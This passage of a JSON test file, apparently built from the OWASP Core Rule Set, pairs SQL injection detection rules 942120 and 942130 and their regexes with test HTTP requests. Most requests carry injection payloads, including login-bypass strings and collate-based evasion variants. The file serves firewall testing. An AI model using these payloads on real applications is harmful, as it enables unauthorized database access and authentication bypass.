"test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=%26%26" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=%26%26" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "<<" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "<<" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%21%3D" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%21%3D" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "||" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "||" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "XOR" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "XOR" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=%3C%3D" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=%3C%3D" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "IS NULL" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "IS NULL" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "in (0,1)" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "in (0,1)" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "in (2147483647,-1)" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "in (2147483647,-1)" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=%3C%3D%3E" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=%3C%3D%3E" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "regexp" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "regexp" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "RLIKE" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "RLIKE" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "<>" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "<>" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "+IN+%28815914%2C+815913%29%0A" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "+IN+%28815914%2C+815913%29%0A" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay= in ( Aa,- Ab-, and Ac)" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay= in ( Aa,- Ab-, and Ac)" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%3E%3D" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%3E%3D" } ] }, { "description": "SQL Injection Attack: not between * and ", "test_id": 22, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "select%20*%20from%20user%20where%20password_last_changed%20not%20between%20'2021-04-11'%20and%20'2021-04-11'" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 23, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=z'or%20email%20notnull--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=z'or%20email%20notnull--" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 24, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=x'%20or%20username%20like%20totpSecret%20escape%20'x';" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 25, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op'%20and%20email%20ilike%20email--" } ] }, { "description": "SQL Injection Attack: SQL Operator Detected", "test_id": 26, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op'%20and%20email%20%3d%20all%20(select%20email)--" } ] }, { "description": "SQLite collate nocase", "test_id": 27, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=user'collate%20nocase--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=user'collate%20nocase--" } ] }, { "description": "SQLite collate nocase", "test_id": 28, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=user'collate%20nocase--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=user'collate%20nocase--" } ] }, { "description": "SQL collate`nocase`", "test_id": 29, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=user'collate%60nocase%60--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=user'collate%60nocase%60--" } ] }, { "description": "Invalid SQL collate foo", "test_id": 30, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=user'collate%20foo--" }, "expected": { "should_block": false, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=user'collate%20foo--" } ] }, { "description": "Invalid SQL collate foo", "test_id": 31, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=user'collate%60utf8mb4_general_ci%60--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=user'collate%60utf8mb4_general_ci%60--" } ] }, { "description": "Collate bypass with character escaping", "test_id": 32, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=user'collate%22%5Cutf8mb4_general_ci%22--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=user'collate%22%5Cutf8mb4_general_ci%22--" } ] }, { "description": "Collate bypass with postgress string escaping U&", "test_id": 33, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=user'collate U%26%22%241%23B%23E%23D%22--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=user'collate U%26%22%241%23B%23E%23D%22--" } ] }, { "description": "Detect auth bypass email=' notnull --", "test_id": 34, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=%27%20notnull%20--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=%27%20notnull%20--" } ] }, { "description": "Test for IJ5N1CXB - unlikely", "test_id": 35, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op'and%20unlikely%20(id)--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op'and%20unlikely%20(id)--" } ] }, { "description": "Negative test for IJ5N1CXB - unlikely", "test_id": 36, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "text=It is highly unlikely this is going to be a false positive" }, "expected": { "should_block": false, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "text=It is highly unlikely this is going to be a false positive" } ] }, { "description": "Test for HOH7M88Q - likelihood", "test_id": 37, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op\\'%20and(%20likelihood%20(id,.0));'\n" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op\\'%20and(%20likelihood%20(id,.0));'\n" } ] }, { "description": "Negative test for HOH7M88Q - likelihood", "test_id": 38, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "text=After calculating the likelihood this should not be matched.\n" }, "expected": { "should_block": false, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "text=After calculating the likelihood this should not be matched.\n" } ] }, { "description": "Detect path-based SQLi attempt", "test_id": 39, "request": { "method": "POST", "uri": "/post/catalogue/rest/products/2499999||this.product/reviews", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "*/*" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [] }, { "description": "SQL Injection Attack: SQL Operator == Detected", "test_id": 40, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%3D%3D" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%3D%3D" } ] }, { "description": "SQL Injection Attack: SQL Operator ! all Detected", "test_id": 41, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=admin%40juice-sh.op'%20and%20email%20%21%20all%20(select%20email)--" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=admin%40juice-sh.op'%20and%20email%20%21%20all%20(select%20email)--" } ] }, { "description": "SQL Injection Attack: SQL Operator >= Detected", "test_id": 42, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": ">%3D" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": ">%3D" } ] }, { "description": "SQL Injection Attack: SQL Operator -> Detected", "test_id": 43, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "->" }, "expected": { "should_block": true, "rule_ids": [ 942120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "->" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 648, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)[!=]=|&&|\\|\\||->|>[=>]|<(?:[<=]|>(?:[\\s\\x0b]+binary)?)|\\b(?:(?:xor|r(?:egexp|like)|i(?:snull|like)|notnull)\\b|collate(?:[^0-9A-Z_a-z]*?(?:U&)?[\\\"'`]|[^0-9A-Z_a-z]+(?:(?:binary|nocase|rtrim)\\b|[0-9A-Z_a-z]*?_))|(?:likel(?:ihood|y)|unlikely)[\\s\\x0b]*\\()|r(?:egexp|like)[\\s\\x0b]+binary|not[\\s\\x0b]+between[\\s\\x0b]+(?:0[\\s\\x0b]+and|(?:'[^']*'|\\\"[^\\\"]*\\\")[\\s\\x0b]+and[\\s\\x0b]+(?:'[^']*'|\\\"[^\\\"]*\\\"))|is[\\s\\x0b]+null|like[\\s\\x0b]+(?:null|[0-9A-Z_a-z]+[\\s\\x0b]+escape\\b)|(?:^|[^0-9A-Z_a-z])in[\\s\\x0b\\+]*\\([\\s\\x0b\\\"0-9]+[^\\(\\)]*\\)|[!<->][\\s\\x0b]*all\\b", "actions": [ { "act_name": "id", "lineno": 649, "act_quote": "no_quote", "act_arg": "942120", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 650, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 651, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 652, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 653, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 653, "act_quote": "no_quote", "act_arg": "utf8toUnicode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 653, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 654, "act_quote": "quotes", "act_arg": "SQL Injection Attack: SQL Operator Detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 655, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 656, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 657, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 658, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 659, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 660, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 661, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 662, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 663, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 664, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 665, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 666, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 667, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 648 } }, { "rule_id": "942130", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)[\\s\\x0b\\\"'-\\)`]*?\\b([0-9A-Z_a-z]+)\\b[\\s\\x0b\\\"'-\\)`]*?(?:=|<=>|(?:sounds[\\s\\x0b]+)?like|glob|r(?:like|egexp))[\\s\\x0b\\\"'-\\)`]*?\\b([0-9A-Z_a-z]+)\\b", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "replaceComments" ], "metadata": { "phase": "2", "message": "SQL Injection Attack: SQL Boolean-based attack detected", "logdata": "Matched Data: %{TX.0} found within %{TX.942130_MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack: SQL Tautology", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" }, "expected": { "should_block": false, "rule_ids": [ 942130 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 2, "request": { "method": "GET", "uri": "/get?a=1=1", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=1=1" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 3, "request": { "method": "GET", "uri": "/get?a=11=1", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=11=1" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 4, "request": { "method": "GET", "uri": "/get?a=1=11", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=1=11" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 5, "request": { "method": "GET", "uri": "/get?a=11!=11", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=11!=11" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 6, "request": { "method": "GET", "uri": "/get?a=b,1=1", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=b,1=1" } ] }, { "description": "SQL Injection Attack: SQL Tautology - like", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "a=42%20like%2042" }, "expected": { "should_block": true, "rule_ids": [ 942130 ] }, "malicious_patterns": [ { "location": "post_body", "value": "a=42%20like%2042" } ] }, { "description": "SQL Injection Attack: SQL Tautology", "test_id": 8, "request": { "method": "GET", "uri": "/get?a=This%20is%20like%20no%20other", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "a=This%20is%20like%20no%20other" } ] }, { "description": "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>", "test_id": 9, "request": { 